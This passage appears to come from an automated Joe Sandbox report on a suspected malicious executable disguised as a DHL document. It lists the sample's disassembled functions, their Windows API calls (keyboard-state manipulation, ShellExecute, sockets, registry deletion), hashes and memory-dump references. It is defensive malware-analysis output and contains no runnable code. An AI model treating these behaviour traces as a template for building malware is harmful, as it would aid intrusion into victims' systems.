                                                                                        • Instruction Fuzzy Hash: B90162F2900208BFE711A7A0DD89FFE776CEB08300F0005B5B745E2051EA749E864B75
                                                                                        Function 00C02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000), ref: 00C02ACF
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C02B17
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000), ref: 00C3C21A
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000), ref: 00C3C286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 62b30fae9e11538de628053d47d989143132904ed088338271c2611784b22bfd
                                                                                        • Instruction ID: c79174320e504ba2e712946697cbcb26d82e1d867bc0c78f5328441c5c732f49
                                                                                        • Opcode Fuzzy Hash: 62b30fae9e11538de628053d47d989143132904ed088338271c2611784b22bfd
                                                                                        • Instruction Fuzzy Hash: 9C412B307146809FDB359B29CCCCB6F7B92AB45314F24881DF167965E1CA75A982F720
                                                                                        Function 00C670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C670DD
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C67114
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00C67130
                                                                                        • _memmove.LIBCMT ref: 00C6717E
                                                                                        • _memmove.LIBCMT ref: 00C6719B
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00C671AA
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C671BF
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C671DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 256516436-0
                                                                                        • Opcode ID: 03f9a581152c1aa55cc8075a5ce13b97dbc621256cdaa599dff6e65ed19ac30b
                                                                                        • Instruction ID: 7674db127f6e20fee856ada8b6cf27870ac41d9d6605ce51794502582f61cf48
                                                                                        • Opcode Fuzzy Hash: 03f9a581152c1aa55cc8075a5ce13b97dbc621256cdaa599dff6e65ed19ac30b
                                                                                        • Instruction Fuzzy Hash: 1D31AD31900215EBCF10DFA4EC85AAFB7B8EF45710F2441BAF904AB246DB309E51DBA4
                                                                                        Function 00C5BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        • Opcode ID: 45aa7915dec6a31c71752182c5351bca72074d24ca74225edc9f0418cfc1050c
                                                                                        • Instruction ID: a8ff8a40091649728c51ee3005417920c5af0190a50771ad8ff08c5188e5c872
                                                                                        • Opcode Fuzzy Hash: 45aa7915dec6a31c71752182c5351bca72074d24ca74225edc9f0418cfc1050c
                                                                                        • Instruction Fuzzy Hash: 4F2105656012197BEA047612AD42FFF7B5C9F2034AF084020FD0996A47EBA4EF59D2AD
                                                                                        Function 00C6EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                        • _wcstok.LIBCMT ref: 00C6EC94
                                                                                        • _wcscpy.LIBCMT ref: 00C6ED23
                                                                                        • _memset.LIBCMT ref: 00C6ED56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 55c1b389b97eb659fae177358649451cb4cbe437b64f362c74aa65b8328fcf69
                                                                                        • Instruction ID: 671d574c2dee340c6a351ac28e84c1dd1aa620fa90ec15010d58293b8005cc35
                                                                                        • Opcode Fuzzy Hash: 55c1b389b97eb659fae177358649451cb4cbe437b64f362c74aa65b8328fcf69
                                                                                        • Instruction Fuzzy Hash: 7EC18F75608300DFC724EF64C885A6AB7E4FF85314F10892DF9999B2A2DB31ED45DB82
                                                                                        Function 00C76B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C76C00
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C76C21
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C76C34
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00C76CEA
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00C76CA7
                                                                                          • Part of subcall function 00C5A7E9: _strlen.LIBCMT ref: 00C5A7F3
                                                                                          • Part of subcall function 00C5A7E9: _memmove.LIBCMT ref: 00C5A815
                                                                                        • _strlen.LIBCMT ref: 00C76D44
                                                                                        • _memmove.LIBCMT ref: 00C76DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3619996494-0
                                                                                        • Opcode ID: b3c45dd52ee504a306cad36a33e336c76353ccab29bf30830f2b1c712dd5a259
                                                                                        • Instruction ID: c2de1f62d882ca8f1c9825f36506e8e6a78e2969bc4893b39a8697adff2aa0e5
                                                                                        • Opcode Fuzzy Hash: b3c45dd52ee504a306cad36a33e336c76353ccab29bf30830f2b1c712dd5a259
                                                                                        • Instruction Fuzzy Hash: 4B81CE71208700AFD720EB24CC82F6BB7A8EF95714F148A1DF9599B2D2DA70AD05DB91
                                                                                        Function 00C01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90f6ac8dcf2aebeecde429ffe70e257e7327cd9db27b0c84bc2bc354063bbea2
                                                                                        • Instruction ID: c0f597f521d6e214871ed89b939023487d4b37bb4392ec1825bfbfa01b1dc65a
                                                                                        • Opcode Fuzzy Hash: 90f6ac8dcf2aebeecde429ffe70e257e7327cd9db27b0c84bc2bc354063bbea2
                                                                                        • Instruction Fuzzy Hash: 84716E30900109EFDB05CF99CC89ABEBB79FF85314F188159F915AA2A1C734AA51DF64
                                                                                        Function 00C7F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C7F448
                                                                                        • _memset.LIBCMT ref: 00C7F511
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00C7F556
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00C7F5CD
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C7F5FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3522835683-2766056989
                                                                                        • Opcode ID: 7951bbb9c47d43d46a26625b0344699d2dc5df1eda82e824738753162f9b1cf2
                                                                                        • Instruction ID: 84290174d68e221d6389175a2f7af38d1b2e221ee8407024ec22542797d53494
                                                                                        • Opcode Fuzzy Hash: 7951bbb9c47d43d46a26625b0344699d2dc5df1eda82e824738753162f9b1cf2
                                                                                        • Instruction Fuzzy Hash: 6461AFB5A00619DFCB14DF64C481AAEBBF5FF48310F14816DE859AB391CB30AE42DB90
                                                                                        Function 00C60F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00C60F8C
                                                                                        • GetKeyboardState.USER32(?), ref: 00C60FA1
                                                                                        • SetKeyboardState.USER32(?), ref: 00C61002
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C61030
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C6104F
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C61095
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C610B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: cb1c3e30899b2f63591546451b090c80d8201dd7b7ab713878e0b636189e60df
                                                                                        • Instruction ID: 3094f6e4bdae240a44cf5dac367ae3e1813f3fe6387e90130ed286169201c308
                                                                                        • Opcode Fuzzy Hash: cb1c3e30899b2f63591546451b090c80d8201dd7b7ab713878e0b636189e60df
                                                                                        • Instruction Fuzzy Hash: AE5123A06047D53DFB3242748C95BBBBFA95B06301F0C8589E5E4968D3C2E8EEC9D751
                                                                                        Function 00C60D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00C60DA5
                                                                                        • GetKeyboardState.USER32(?), ref: 00C60DBA
                                                                                        • SetKeyboardState.USER32(?), ref: 00C60E1B
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C60E47
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C60E64
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C60EA8
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C60EC9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 8809b277414305c75095e1da0e39fbb2b22e7b607f24e1fdd85b306bff3a5fce
                                                                                        • Instruction ID: c14df696033dbef6f2ac8e5d8979b1c91118e75cb594c099bff43e083763b6d4
                                                                                        • Opcode Fuzzy Hash: 8809b277414305c75095e1da0e39fbb2b22e7b607f24e1fdd85b306bff3a5fce
                                                                                        • Instruction Fuzzy Hash: 495126A05447E53DFB3683748C95B7B7FA96B06300F1C898DF1E4A64C2D396AE98E350
                                                                                        Function 00C655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 6643cae3a16e95fc1ad44def64ea8795cfec075b4ab12c2854b6e3f9e83f146a
                                                                                        • Instruction ID: 2aaa19bc32d0893b2555ebb7b4c56e891c0883bd74e0f4340a63c9f3ed7e0bb4
                                                                                        • Opcode Fuzzy Hash: 6643cae3a16e95fc1ad44def64ea8795cfec075b4ab12c2854b6e3f9e83f146a
                                                                                        • Instruction Fuzzy Hash: BA419275C1062476CB21EBB4DC86ACFB3B89F04310F508966F519E3621EB34E395D7AA
                                                                                        Function 00C8A056 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 0-2594219639
                                                                                        • Opcode ID: 6bb855a673a727a640f43c9b0fe802a8fb4007c2f1a9014f099bc8e70d5b2093
                                                                                        • Instruction ID: de3677be1de71f5f398140fd0f5b0e5c44fd86bf2010aeb219a74a12ed63c84a
                                                                                        • Opcode Fuzzy Hash: 6bb855a673a727a640f43c9b0fe802a8fb4007c2f1a9014f099bc8e70d5b2093
                                                                                        • Instruction Fuzzy Hash: 6A41C635904114EFE714EF28CC4CFADBBA4EB09314F150266F826A72E1C730AE41EB59
                                                                                        Function 00C63671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C63697,?), ref: 00C6468B
                                                                                          • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C63697,?), ref: 00C646A4
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C636B7
                                                                                        • _wcscmp.LIBCMT ref: 00C636D3
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00C636EB
                                                                                        • _wcscat.LIBCMT ref: 00C63733
                                                                                        • SHFileOperationW.SHELL32(?), ref: 00C6379F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1377345388-1173974218
                                                                                        • Opcode ID: f9b2f79c84972637a132df5091b0e8dc92a87f8f708a80038a4eb609980a4736
                                                                                        • Instruction ID: 64eac304b3ce0dadb6aa9b5c5117c1cc442d2fcd5a952532588b3f9cfb97496c
                                                                                        • Opcode Fuzzy Hash: f9b2f79c84972637a132df5091b0e8dc92a87f8f708a80038a4eb609980a4736
                                                                                        • Instruction Fuzzy Hash: D3416371508344AEC765EF64D881ADF77E8EF89340F00092EB49AC3151EA34D789D756
                                                                                        Function 00C87291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C872AA
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C87351
                                                                                        • IsMenu.USER32(?), ref: 00C87369
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C873B1
                                                                                        • DrawMenuBar.USER32 ref: 00C873C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 3866635326-4108050209
                                                                                        • Opcode ID: 430b32e60f85c24d0b1aa2b604ba092c37e52e50bfa103282dc35fdd9086cd3c
                                                                                        • Instruction ID: bc85120b1f5cfb0ac9530c98b202772f7a9e863547f3a9aff4f3cc81693c7102
                                                                                        • Opcode Fuzzy Hash: 430b32e60f85c24d0b1aa2b604ba092c37e52e50bfa103282dc35fdd9086cd3c
                                                                                        • Instruction Fuzzy Hash: CB411675A44208EFDB20EF50D884E9ABBB8FB05354F248629FD15A7260E730EE50EB55
                                                                                        Function 00C80FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C80FD4
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C80FFE
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00C810B5
                                                                                          • Part of subcall function 00C80FA5: RegCloseKey.ADVAPI32(?), ref: 00C8101B
                                                                                          • Part of subcall function 00C80FA5: FreeLibrary.KERNEL32(?), ref: 00C8106D
                                                                                          • Part of subcall function 00C80FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C81090
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C81058
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        • Opcode ID: 6558ee531aff72caf32b16aae6124eb90081b2716dc2c0aa0f95c402f5a259b0
                                                                                        • Instruction ID: dc34195332cf7fbbe96eb76cdbb92aabf2e7adcedf4dd442c5ba4c2e0da90be1
                                                                                        • Opcode Fuzzy Hash: 6558ee531aff72caf32b16aae6124eb90081b2716dc2c0aa0f95c402f5a259b0
                                                                                        • Instruction Fuzzy Hash: 5B311E71900109BFDB159F90DC89AFFB7BCEF08304F14016AE912E2141D7745F8A9BA4
                                                                                        Function 00C5DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DB2E
